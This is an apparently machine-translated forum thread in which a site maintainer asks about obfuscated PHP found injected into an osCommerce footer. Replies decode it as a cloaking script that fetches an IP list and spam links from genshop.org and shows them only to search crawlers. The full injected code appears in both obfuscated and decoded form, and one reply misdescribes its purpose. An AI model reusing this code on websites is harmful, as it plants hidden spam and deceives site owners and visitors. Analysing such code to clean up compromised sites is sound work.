此代码是否被利用？这是什么代码？

| 我正在寻找一个被某人/某物利用的网站。该网站的页脚中已经插入了许多链接，这些链接都链接到药物宣传，还有谁知道呢。页脚顶部有很多链接。我现在只能在Yahoo索引中的缓存页面上找到它们。 Google对该网站仍然不满意，并且该实时网站不再显示任何链接。这是给客户的..所以我大多数时候都知道我被告知的内容，以及其他可以发现的内容。我在footer.php的\“ tip / top \”（这是一个OsCommerse网站）的\“ tip / top \”中找到了以下代码：

<?php $x13=\"cou\\156\\x74\"; $x14=\"\\x65\\x72\\162\\x6fr\\x5f\\x72ep\\157\\162\\164ing\"; $x15=\"\\146\\151l\\x65\"; $x16=\"\\146i\\154\\145_g\\x65t\\x5f\\x63\\x6fn\\164\\145n\\164s\"; $x17=\"\\163\\x74rle\\156\"; $x18=\"\\163tr\\160o\\x73\"; $x19=\"su\\x62\\x73\\164\\162\"; $x1a=\"tr\\151m\"; 
ini_set(\' display_errors\',\'off\');$x14(0);$x0b = \"\\150t\\x74p\\x3a\\057\\057\\x67\\145n\\x73h\\157\\x70\\056org/\\163\\x63\\162ipt\\057\\155a\\163k\\x2e\\x74x\\x74\";$x0c = $x0b; $x0d = $_SERVER[\"\\x52E\\115O\\124\\105_A\\104\\104\\122\"]; $x0e = @ $x15($x0c); for ( $x0f = 0; $x0f < $x13($x0e); $x0f++ ) {$x10 = $x1a($x0e[$x0f]);if ( $x10 != \"\" ){ if ( ($x11 = $x18($x10, \"*\")) !== false ) $x10 = $x19($x10, 0,$x11); if ( $x17($x10) <= $x17($x0d) && $x18($x0d, $x10) === 0 ) { $x12 =$x16(\"\\150\\164\\164\\160\\x3a/\\057g\\145\\x6e\\x73\\x68o\\160\\056o\\162\\x67\\057\\160aral\\x69\\x6e\\x6b\\x73\\x2f\\156e\\167\\x2f3\\057\\x66\\145e\\144\\x72\\157lle\\x72\\x2e\\143\\x6f\\x6d\\x2e\\x74\\170\\x74\"); echo \"$x12\"; } }}echo \"\\x3c\\041\\055\\x2d \\060\\x36\\071\\x63\\x35b4\\x66e5\\060\\062\\067\\146\\x39\\x62\\0637\\x64\\x653\\x31d2be5\\145\\141\\143\\066\\x37\\040\\x2d-\\076\";?>

当我查看具有\'Bad \'链接的源缓存页面时，此代码正好适合在footer.php源代码中找到它的位置。 Google的一项小研究表明，有类似代码的漏洞利用。您怎么看，当我在自己的服务器上运行它时，我得到的只是源代码中的回显注释，如下所示：

<!-- 069c5b4fe5027f9b37de31d2be5eac67 -->

我不想仅仅因为它看起来很糟糕而匆忙删除代码并说“你的好”，尤其是因为我没有立即知道“坏链接”已经消失的方法。顺便说一句，所有链接都转到无效的URL。您会看到仍然在Yahoo中缓存的不良页面： http://74.6.117.48/search/srpcache?ei=UTF-8&p=http%3A%2F%2Fwww.feedroller.com%2F+medicine&fr=yfp-t-701&u=http://cc.bingj.com/ cache.aspx？q = http％3a％2f％2fwww.feedroller.com％2f + medicine＆d = 4746458759365253＆mkt = zh-CN＆setlang = zh-CN＆w = b97b0175，d5f14ae5＆icp = 1＆.intl = us＆sig = Ifqk1OuvHXNcZnAg--

已邀请:

3 个回复

痰降锭骂奸

这是清晰的脚本（或多或少）只是将该网址的内容转储到您的页面上它还会根据IP列表（google等）检查remote_addr，以使其保持未被检测到的状态。看起来您被genshop.com迷住了

<?php

 $count=\"cou\\156\\x74\"; // count 
 $error_reporting=\"\\x65\\x72\\162\\x6fr\\x5f\\x72ep\\157\\162\\164ing\"; // error_reporting
 $file=\"\\146\\151l\\x65\"; // file
 $file_get_contents=\"\\146i\\154\\145_g\\x65t\\x5f\\x63\\x6fn\\164\\145n\\164s\"; // file_get_contents
 $strlen=\"\\163\\x74rle\\156\"; // strlen
 $strpos=\"\\163tr\\160o\\x73\"; // strpos
 $substr=\"su\\x62\\x73\\164\\162\"; // substr
 $trim=\"tr\\151m\"; //trim

ini_set(\' display_errors\',\'off\');
$error_reporting(0);

$x0b = \"http://genshop.org/scripts/mask.txt\";
$url = $x0b;
$tmp = \"REMOTE_ADDR\";
$x0d = $_SERVER[$tmp];
$tmp_filename = \"http://genshop.org/paralinks/new/3/feedroller.com.txt\";

$IPs = @ $file($url);
for ( $i = 0; $i < $count($IPs); $i++ ) {
    $curr_ip = $trim($ips[$i]);
        if ( $curr_ip != \"\" ) {
            if ( ($x11 = $strpos($curr_ip, \"*\")) !== false )
                $curr_ip = $substr($curr_ip, 0,$x11);

            // check visitor ip against mask list
            if ( $strlen($curr_ip) <= $strlen($x0d) && $strpos($x0d, $curr_ip) === 0 ) {
                $x12 = $file_get_content($tmp_filename);
                echo \"$x12\";
                // print spam contents
            }
        }
    }
echo $curr_ip;
}

$tmp2 = \"\\x3c\\041\\055\\x2d \\060\\x36\\071\\x63\\x35b4\\x66e5\\060\\062\\067\\146\\x39\\x62\\0637\\x64\\x653\\x31d2be5\\145\\141\\143\\066\\x37\\040\\x2d-\\076\";
echo $tmp2;
?>

抹持奠糙驰

似乎引用/加载了两个URL： http://genshop.org/script/mask.txt http://genshop.org/paralinks/new/3/feedroller.com.txt 它只是垃圾邮件分发脚本。对于部分混淆，请使用：

print preg_replace(\'#\"[^\"]+\\\\\\\\\\w+\"#e\', \"stripcslashes(\'$0\')\", $source);

孝铜差

这实际上是一种转储有关正在运行的配置的信息的尝试。立即将其删除。它的工作方式非常复杂，超出了我的范围，但这是黑客入侵您的网站的第一步。

要回复问题请先登录或注册

此代码是否被利用？这是什么代码？

3 个回复

发起人

exploit

php

shellcode

问题状态

此代码是否被利用？这是什么代码？

与内容相关的链接

3 个回复

发起人

exploit

php

shellcode

问题状态